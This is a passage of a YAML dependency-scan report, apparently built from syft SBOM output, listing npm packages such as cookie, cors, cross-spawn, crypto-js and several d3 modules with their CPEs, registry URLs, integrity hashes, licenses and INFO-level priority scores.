- cpe: cpe:2.3:a:cookie:cookie:0.7.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/cookie@0.7.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cookie/-/cookie-0.7.2.tgz
|
|
integrity: sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 980ccdca1420305a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cookie-signature 1.0.7'
|
|
title: cookie-signature 1.0.7
|
|
description: 'Package discovered: cookie-signature 1.0.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c3cdc836e23cbee4
|
|
name: cookie-signature
|
|
version: 1.0.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cookie-signature_project:cookie-signature:1.0.7:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/cookie-signature@1.0.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.7.tgz
|
|
integrity: sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8ea7108a43fc0ad4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: core-util-is 1.0.3'
|
|
title: core-util-is 1.0.3
|
|
description: 'Package discovered: core-util-is 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9bfb1fb9a1cd315e
|
|
name: core-util-is
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:core-util-is:core-util-is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core-util-is:core_util_is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core_util_is:core-util-is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core_util_is:core_util_is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core-util:core-util-is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core-util:core_util_is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core_util:core-util-is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core_util:core_util_is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core:core-util-is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:core:core_util_is:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/core-util-is@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz
|
|
integrity: sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 171e24f79e6f61b0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cors 2.8.6'
|
|
title: cors 2.8.6
|
|
description: 'Package discovered: cors 2.8.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c8f0caa18c740c23
|
|
name: cors
|
|
version: 2.8.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cors:cors:2.8.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/cors@2.8.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cors/-/cors-2.8.6.tgz
|
|
integrity: sha512-tJtZBBHA6vjIAaF6EnIaq6laBBP9aq/Y3ouVJjEfoHbRBcHBAHYcMh/w8LDrk2PvIMMq8gmopa5D4V8RmbrxGw==
|
|
dependencies:
|
|
object-assign: ^4
|
|
vary: ^1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 24841e3ab0fadbb6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
startLine: 0
|
|
message: 'Package discovered: coverallsapp/github-action master'
|
|
title: coverallsapp/github-action master
|
|
description: 'Package discovered: coverallsapp/github-action master'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cbf693155383c51f
|
|
name: coverallsapp/github-action
|
|
version: master
|
|
type: github-action
|
|
foundBy: github-actions-usage-cataloger
|
|
locations:
|
|
- path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: ''
|
|
cpes:
|
|
- cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github-action:master:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github_action:master:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github-action:master:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github_action:master:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github-action:master:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github_action:master:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:github/coverallsapp/github-action@master
|
|
metadataType: github-actions-use-statement
|
|
metadata:
|
|
value: coverallsapp/github-action@master
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c42474dc158d56dd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cross-fetch 3.2.0'
|
|
title: cross-fetch 3.2.0
|
|
description: 'Package discovered: cross-fetch 3.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1ef521ded724ae55
|
|
name: cross-fetch
|
|
version: 3.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cross-fetch_project:cross-fetch:3.2.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/cross-fetch@3.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.2.0.tgz
|
|
integrity: sha512-Q+xVJLoGOeIMXZmbUK4HYk+69cQH6LudR0Vu/pRm2YlU/hDV9CiS0gKUMaWY5f2NeUH9C1nV3bsTlCo0FsTV1Q==
|
|
dependencies:
|
|
node-fetch: ^2.7.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ab79d32b8583840a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cross-spawn 7.0.6'
|
|
title: cross-spawn 7.0.6
|
|
description: 'Package discovered: cross-spawn 7.0.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 043761526fd95886
|
|
name: cross-spawn
|
|
version: 7.0.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cross-spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cross-spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cross_spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cross_spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cross:cross-spawn:7.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:cross:cross_spawn:7.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/cross-spawn@7.0.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz
|
|
integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==
|
|
dependencies:
|
|
path-key: ^3.1.0
|
|
shebang-command: ^2.0.0
|
|
which: ^2.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8714b6edd2c6df07
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: crypto-js 4.2.0'
|
|
title: crypto-js 4.2.0
|
|
description: 'Package discovered: crypto-js 4.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2eb6177b3fd9fb78
|
|
name: crypto-js
|
|
version: 4.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:crypto-js:crypto-js:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:crypto-js:crypto_js:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:crypto_js:crypto-js:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:crypto_js:crypto_js:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:crypto:crypto-js:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:crypto:crypto_js:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/crypto-js@4.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/crypto-js/-/crypto-js-4.2.0.tgz
|
|
integrity: sha512-KALDyEYgpY+Rlob/iriUtjV6d5Eq+Y191A5g4UqLAi8CyGP9N1+FdVbkc1SxKc2r4YAYqG8JzO2KGL+AizD70Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5c9f6165bd9afd4d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cssesc 3.0.0'
|
|
title: cssesc 3.0.0
|
|
description: 'Package discovered: cssesc 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7ab312baa29fde7a
|
|
name: cssesc
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:cssesc:cssesc:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/cssesc@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz
|
|
integrity: sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e510323d242254fb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: csstype 3.2.3'
|
|
title: csstype 3.2.3
|
|
description: 'Package discovered: csstype 3.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7a5abc30c1904007
|
|
name: csstype
|
|
version: 3.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:csstype:csstype:3.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/csstype@3.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz
|
|
integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bd9d3c33974e198d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-array 3.2.4'
|
|
title: d3-array 3.2.4
|
|
description: 'Package discovered: d3-array 3.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d16a22647e62d254
|
|
name: d3-array
|
|
version: 3.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-array:d3-array:3.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-array:d3_array:3.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_array:d3-array:3.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_array:d3_array:3.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-array:3.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_array:3.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-array@3.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-array/-/d3-array-3.2.4.tgz
|
|
integrity: sha512-tdQAmyA18i4J7wprpYq8ClcxZy3SC31QMeByyCFyRt7BVHdREQZ5lpzoe5mFEYZUWe+oq8HBvk9JjpibyEV4Jg==
|
|
dependencies:
|
|
internmap: 1 - 2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fe81bed2b7c1ca62
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-color 3.1.0'
|
|
title: d3-color 3.1.0
|
|
description: 'Package discovered: d3-color 3.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 633ef642a5395c1a
|
|
name: d3-color
|
|
version: 3.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-color:d3-color:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-color:d3_color:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_color:d3-color:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_color:d3_color:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-color:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3_color:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/d3-color@3.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/d3-color/-/d3-color-3.1.0.tgz
|
|
integrity: sha512-zg/chbXyeBtMQ1LbD/WSoW2DpC3I0mpmPdW+ynRTj/x2DAWYrIY7qeZIHidozwV24m4iavr15lNwIwLxRmOxhA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d9ebb131f790b372
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: d3-ease 3.0.1'
|
|
title: d3-ease 3.0.1
|
|
description: 'Package discovered: d3-ease 3.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5c5a953bcb066b0e
|
|
name: d3-ease
|
|
version: 3.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:d3-ease:d3-ease:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3-ease:d3_ease:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_ease:d3-ease:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3_ease:d3_ease:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:d3:d3-ease:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
